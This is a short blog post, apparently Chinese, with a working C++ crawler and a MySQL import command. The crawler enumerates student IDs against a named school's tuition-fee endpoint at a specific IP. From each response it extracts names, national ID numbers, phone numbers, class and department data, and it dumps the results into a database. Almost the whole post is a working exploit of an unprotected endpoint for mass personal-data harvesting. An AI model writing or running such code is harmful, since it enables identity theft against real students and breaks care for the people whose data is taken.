Fuck lkdsyxywx.xcht.cc

crawler

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <cstdint>
#include <string>
#include <thread>
#include <valarray>
#include <algorithm>
#include <list>
#include <regex>

std::string Fuck(const char* ip, const uint16_t port, const int studentID)
{
	const auto sock = socket(AF_INET, SOCK_STREAM, 0);
	struct sockaddr_in server;
	server.sin_family = AF_INET;
	server.sin_port = htons(port);
	server.sin_addr.s_addr = inet_addr(ip);
	const socklen_t len = sizeof(struct sockaddr_in);
	connect(sock, (struct sockaddr*)&server, len);
	const auto sendBuf = (std::string(
			"POST /web/view/FreshmenPayTuitionFees.aspx/queryStudentByStuNo \
HTTP/1.1\r\nHost: lkdsyxywx.xcht.cc\r\nAccept : application / json, text / javas\
cript, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nAccept-Language: zh-cn\
\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/json; charset=UT\
F-8\r\nOrigin: http://lkdsyxywx.xcht.cc\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU \
iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/\
15E148 MicroMessenger/7.0.5(0x17000523) NetType/WIFI Language/zh_CN\r\nConnectio\
n: close\r\nReferer: http://lkdsyxywx.xcht.cc/web/view/FreshmenPayTuitionFees.as\
px\r\nContent-Length: 38\r\n\r\n{'jsonStr':'{\"studentID\":\"")
		+ std::to_string(studentID) + "\"}'}").c_str();
	const auto sendLen = strlen(sendBuf);
	write(sock, sendBuf, sendLen);
	char readBuf[1024] = {0};
	read(sock, readBuf, 1024);
	printf("%s", readBuf);
	close(sock);
	return std::string(readBuf);
}

void Write(FILE* fp, std::string str)
{
	fwrite(str.c_str(), sizeof(uint8_t), str.length(), fp);
}

int main(int argc, char* argv[])
{
	if (argc != 5)
	{
		fprintf(stderr, "%s startStudentID endStudentID(exclude) threadNum savePath\n", argv[0]);
		exit(EXIT_FAILURE);
	}
	std::list<std::string> res(0);
	const auto startStudentID = strtol(argv[1], &argv[1], 10);
	const auto endStudentID = strtol(argv[2], &argv[2], 10);
	const auto threadNum = strtol(argv[3], &argv[3], 10);
	const auto count = endStudentID - startStudentID;
	const auto step = count / threadNum;
	std::valarray<std::thread> threads(threadNum);
	int id = 1;
	FILE* fp = fopen(argv[4], "wb");
	std::generate(begin(threads), end(threads), [&]() mutable
	{
		return std::thread([&]() mutable
		{
			const auto start = startStudentID + step * (id - 1);
			const auto end = threadNum == id ? endStudentID : start + step;
			const auto _id = id++;
			printf("thread %d(start=%d, end=%d) start.\n", _id, start, end);
			for (uint32_t i = start; i < end; i++)
			{
				auto s = Fuck("113.246.56.98", 80, i);
#define Json(key, json, sm) \
	std::regex_search(json, sm, std::regex("\\\\\""#key"\\\\\":(\\\\\".+?\\\\\"|null)")); \
	const auto (key) = std::regex_replace((sm)[0].str(), std::regex("(\\\\\""#key"\\\\\":|\\\\\")"), "")
				printf("%s\n", s.c_str());
				std::smatch sm;
				Json(XH, s, sm);
				Json(XM, s, sm);
				Json(XB, s, sm);
				Json(RXND, s, sm);
				Json(SFZH, s, sm);
				Json(BJMC, s, sm);
				Json(ZYMC, s, sm);
				Json(BMMC, s, sm);
				Json(phoneNo, s, sm);
				printf("%s|%s|%s|%s|%s|%s|%s|%s|%s\n", XH.c_str(), XM.c_str(), XB.c_str(), RXND.c_str(), SFZH.c_str(),
				       BJMC.c_str(), ZYMC.c_str(), BMMC.c_str(), phoneNo.c_str());
				fprintf(fp, "%s|%s|%s|%s|%s|%s|%s|%s|%s\n", XH.c_str(), XM.c_str(), XB.c_str(), RXND.c_str(),
				       SFZH.c_str(), BJMC.c_str(), ZYMC.c_str(), BMMC.c_str(), phoneNo.c_str());
			}
			printf("thread %d exit.\n", _id);
		});
	});
	for (auto& thread : threads) thread.join();
	fclose(fp);
}

import to mysql

load data infile '2005-2020.txt' into table swxy.swxy
fields terminated by '|'
lines terminated by '\n';

 

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注